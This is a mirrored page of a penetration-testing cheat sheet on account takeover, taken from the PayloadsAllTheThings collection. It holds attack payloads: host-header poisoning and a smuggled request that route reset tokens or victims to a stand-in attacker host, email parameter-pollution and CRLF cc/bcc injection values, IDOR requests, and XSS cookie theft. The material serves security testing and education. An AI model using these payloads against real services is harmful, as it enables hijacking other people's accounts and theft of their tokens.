daemon-sec-cheatsheet

The cheatsheet vault for operators: AD, enumeration, exploitation, priv-esc, web, DFIR
git clone https://git.daemon-sec.xyz/daemon-sec-cheatsheet.git
Log | Files | Refs | README | LICENSE

index.md (7611B)


      1 ---
      2 title: "Account Takeover"
      3 topic: "Account Takeover"
      4 topicSlug: "account-takeover"
      5 sourcePath: "Account Takeover/README.md"
      6 sourceUrl: "https://github.com/swisskyrepo/PayloadsAllTheThings/blob/3ac27901c711/Account%20Takeover/README.md"
      7 sha: "3ac27901c711"
      8 isReadme: true
      9 ---
     10 
     11 # Account Takeover
     12 
     13 > Account Takeover (ATO) is a significant threat in the cybersecurity landscape, involving unauthorized access to users' accounts through various attack vectors.
     14 
     15 ## Summary
     16 
     17 * [Password Reset Feature](#password-reset-feature)
     18     * [Password Reset Token Leak via Referrer](#password-reset-token-leak-via-referrer)
     19     * [Account Takeover Through Password Reset Poisoning](#account-takeover-through-password-reset-poisoning)
     20     * [Password Reset via Email Parameter](#password-reset-via-email-parameter)
     21     * [IDOR on API Parameters](#idor-on-api-parameters)
     22     * [Weak Password Reset Token](#weak-password-reset-token)
     23     * [Leaking Password Reset Token](#leaking-password-reset-token)
     24     * [Password Reset via Username Collision](#password-reset-via-username-collision)
     25     * [Account Takeover Due To Unicode Normalization Issue](#account-takeover-due-to-unicode-normalization-issue)
     26 * [Account Takeover via Web Vulnerabilities](#account-takeover-via-web-vulnerabilities)
     27     * [Account Takeover via Cross Site Scripting](#account-takeover-via-cross-site-scripting)
     28     * [Account Takeover via HTTP Request Smuggling](#account-takeover-via-http-request-smuggling)
     29     * [Account Takeover via CSRF](#account-takeover-via-csrf)
     30 * [References](#references)
     31 
     32 ## Password Reset Feature
     33 
     34 ### Password Reset Token Leak via Referrer
     35 
     36 1. Request password reset to your email address
     37 2. Click on the password reset link
     38 3. Don't change password
     39 4. Click any 3rd party websites(e.g., Facebook, twitter)
     40 5. Intercept the request in Burp Suite proxy
     41 6. Check if the referer header is leaking password reset token.
     42 
     43 ### Account Takeover Through Password Reset Poisoning
     44 
     45 1. Intercept the password reset request in Burp Suite
     46 2. Add or edit the following headers in Burp Suite : `Host: [ATTACKER.DOMAIN.TLD]`, `X-Forwarded-Host: [ATTACKER.DOMAIN.TLD]`
     47 3. Forward the request with the modified header
     48 
     49     ```http
     50     POST https://example.com/reset.php HTTP/1.1
     51     Accept: */*
     52     Content-Type: application/json
     53     Host: [ATTACKER.DOMAIN.TLD]
     54     ```
     55 
     56 4. Look for a password reset URL based on the *host header* like : `https://[ATTACKER.DOMAIN.TLD]/reset-password.php?token=TOKEN`
     57 
     58 ### Password Reset via Email Parameter
     59 
     60 ```powershell
     61 # parameter pollution
     62 email=victim@mail.com&email=hacker@mail.com
     63 
     64 # array of emails
     65 {"email":["victim@mail.com","hacker@mail.com"]}
     66 
     67 # carbon copy
     68 email=victim@mail.com%0A%0Dcc:hacker@mail.com
     69 email=victim@mail.com%0A%0Dbcc:hacker@mail.com
     70 
     71 # separator
     72 email=victim@mail.com,hacker@mail.com
     73 email=victim@mail.com%20hacker@mail.com
     74 email=victim@mail.com|hacker@mail.com
     75 ```
     76 
     77 ### IDOR on API Parameters
     78 
     79 1. Attacker have to login with their account and go to the **Change password** feature.
     80 2. Start the Burp Suite and Intercept the request
     81 3. Send it to the repeater tab and edit the parameters : User ID/email
     82 
     83     ```powershell
     84     POST /api/changepass
     85     [...]
     86     ("form": {"email":"victim@email.com","password":"securepwd"})
     87     ```
     88 
     89 ### Weak Password Reset Token
     90 
     91 The password reset token should be randomly generated and unique every time.
     92 Try to determine if the token expire or if it's always the same, in some cases the generation algorithm is weak and can be guessed. The following variables might be used by the algorithm.
     93 
     94 * Timestamp
     95 * UserID
     96 * Email of User
     97 * Firstname and Lastname
     98 * Date of Birth
     99 * Cryptography
    100 * Number only
    101 * Small token sequence (<6 characters between [A-Z,a-z,0-9])
    102 * Token reuse
    103 * Token expiration date
    104 
    105 ### Leaking Password Reset Token
    106 
    107 1. Trigger a password reset request using the API/UI for a specific email e.g: <test@mail.com>
    108 2. Inspect the server response and check for `resetToken`
    109 3. Then use the token in an URL like `https://example.com/v3/user/password/reset?resetToken=[THE_RESET_TOKEN]&email=[THE_MAIL]`
    110 
    111 ### Password Reset via Username Collision
    112 
    113 1. Register on the system with a username identical to the victim's username, but with white spaces inserted before and/or after the username. e.g: `"admin "`
    114 2. Request a password reset with your malicious username.
    115 3. Use the token sent to your email and reset the victim password.
    116 4. Connect to the victim account with the new password.
    117 
    118 The platform CTFd was vulnerable to this attack.
    119 See: [CVE-2020-7245](https://nvd.nist.gov/vuln/detail/CVE-2020-7245)
    120 
    121 ### Account Takeover Due To Unicode Normalization Issue
    122 
    123 When processing user input involving unicode for case mapping or normalisation, unexpected behavior can occur.  
    124 
    125 * Victim account: `demo@gmail.com`
    126 * Attacker account: `demⓞ@gmail.com`
    127 
    128 [Unisub - is a tool that can suggest potential unicode characters that may be converted to a given character](https://github.com/tomnomnom/hacks/tree/master/unisub).
    129 
    130 [Unicode pentester cheatsheet](https://gosecure.github.io/unicode-pentester-cheatsheet/) can be used to find list of suitable unicode characters based on platform.
    131 
    132 ## Account Takeover via Web Vulnerabilities
    133 
    134 ### Account Takeover via Cross Site Scripting
    135 
    136 1. Find an XSS inside the application or a subdomain if the cookies are scoped to the parent domain : `*.domain.com`
    137 2. Leak the current **sessions cookie**
    138 3. Authenticate as the user using the cookie
    139 
    140 ### Account Takeover via HTTP Request Smuggling
    141 
    142 Refer to **HTTP Request Smuggling** vulnerability page.
    143 
    144 1. Use **smuggler** to detect the type of HTTP Request Smuggling (CL, TE, CL.TE)
    145 
    146     ```powershell
    147     git clone https://github.com/defparam/smuggler.git
    148     cd smuggler
    149     python3 smuggler.py -h
    150     ```
    151 
    152 2. Craft a request which will overwrite the `POST / HTTP/1.1` with the following data:
    153 
    154     ```powershell
    155     GET http://[ATTACKER.DOMAIN.TLD]  HTTP/1.1
    156     X: 
    157     ```
    158 
    159 3. Final request could look like the following
    160 
    161     ```powershell
    162     GET /  HTTP/1.1
    163     Transfer-Encoding: chunked
    164     Host: something.com
    165     User-Agent: Smuggler/v1.0
    166     Content-Length: 83
    167 
    168     0
    169 
    170     GET http://[ATTACKER.DOMAIN.TLD]  HTTP/1.1
    171     X: X
    172     ```
    173 
    174 Hackerone reports exploiting this bug
    175 
    176 * <https://hackerone.com/reports/737140>
    177 * <https://hackerone.com/reports/771666>
    178 
    179 ### Account Takeover via CSRF
    180 
    181 1. Create a payload for the CSRF, e.g: "HTML form with auto submit for a password change"
    182 2. Send the payload
    183 
    184 ### Account Takeover via JWT
    185 
    186 JSON Web Token might be used to authenticate a user.
    187 
    188 * Edit the JWT with another User ID / Email
    189 * Check for weak JWT signature
    190 
    191 ## References
    192 
    193 * [$6,5k + $5k HTTP Request Smuggling mass account takeover - Slack + Zomato - Bug Bounty Reports Explained - August 30, 2020](https://web.archive.org/web/20250701123134/https://www.youtube.com/watch?v=gzM4wWA7RFo)
    194 * [10 Password Reset Flaws - Anugrah SR - September 16, 2020](https://web.archive.org/web/20250626114943/https://anugrahsr.github.io/posts/10-Password-reset-flaws/)
    195 * [Broken Cryptography & Account Takeovers - Harsh Bothra - September 20, 2020](https://web.archive.org/web/20250913121907/https://speakerdeck.com/harshbothra/broken-cryptography-and-account-takeovers?slide=28)
    196 * [CTFd Account Takeover - NIST National Vulnerability Database - March 29, 2020](https://web.archive.org/web/20200329075120/https://nvd.nist.gov/vuln/detail/CVE-2020-7245)
    197 * [Hacking Grindr Accounts with Copy and Paste - Troy Hunt - October 3, 2020](https://web.archive.org/web/20251219192449/https://www.troyhunt.com/hacking-grindr-accounts-with-copy-and-paste/)